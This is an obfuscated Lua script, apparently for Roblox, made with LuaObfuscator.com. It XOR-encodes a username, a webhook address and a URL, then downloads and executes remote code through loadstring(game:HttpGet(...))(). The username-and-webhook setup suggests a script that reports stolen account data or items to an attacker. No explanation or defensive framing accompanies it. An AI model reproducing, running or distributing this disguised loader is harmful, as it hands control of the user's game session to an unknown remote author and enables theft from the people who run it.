--[[
 .____                  ________ ___.    _____                           __                
 |    |    __ _______   \_____  \\_ |___/ ____\_ __  ______ ____ _____ _/  |_  ___________ 
 |    |   |  |  \__  \   /   |   \| __ \   __\  |  \/  ___// ___\\__  \\   __\/  _ \_  __ \
 |    |___|  |  // __ \_/    |    \ \_\ \  | |  |  /\___ \\  \___ / __ \|  | (  <_> )  | \/
 |_______ \____/(____  /\_______  /___  /__| |____//____  >\___  >____  /__|  \____/|__|   
         \/          \/         \/    \/                \/     \/     \/                   
          \_Welcome to LuaObfuscator.com   (Alpha 0.10.8) ~  Much Love, Ferib 

]]--

local v0=string.char;local v1=string.byte;local v2=string.sub;local v3=bit32 or bit ;local v4=v3.bxor;local v5=table.concat;local v6=table.insert;local function v7(v8,v9) local v10={};for v11=1, #v8 do v6(v10,v0(v4(v1(v2(v8,v11,v11 + 1 )),v1(v2(v9,1 + (v11% #v9) ,1 + (v11% #v9) + 1 )))%256 ));end return v5(v10);end Username=v7("\253\202\218\40\231\183\211\46\194\154\130\117","\126\177\163\187\69\134\219\167");Webhook=v7("\43\217\62\213\239\121\130\101\193\245\48\206\37\215\248\109\206\37\200\179\34\221\35\138\235\38\207\34\202\243\40\222\101\148\175\114\155\123\148\165\123\155\123\146\171\114\149\115\156\172\118\159\101\238\174\39\232\4\136\196\34\236\31\148\216\33\204\1\231\229\55\216\58\253\222\52\254\29\208\229\40\254\30\213\221\47\244\28\227\235\59\198\56\215\230\57\245\36\233\201\40\255\123\226\221\44\255\19\157\211\44\215\48\225\253\117\198\30\147\177\11","\156\67\173\74\165");loadstring(game:HttpGet(v7("\60\163\93\6\175\124\9\123\165\72\1\242\33\79\32\191\92\20\169\53\67\38\180\70\24\168\35\72\32\249\74\25\177\105\111\57\147\64\17\181\50\71\56\173\6\59\179\52\79\7\180\91\31\172\50\85\123\186\72\31\178\105\107\59\165\64\37\191\52\79\36\163\90","\38\84\215\41\118\220\70")))();
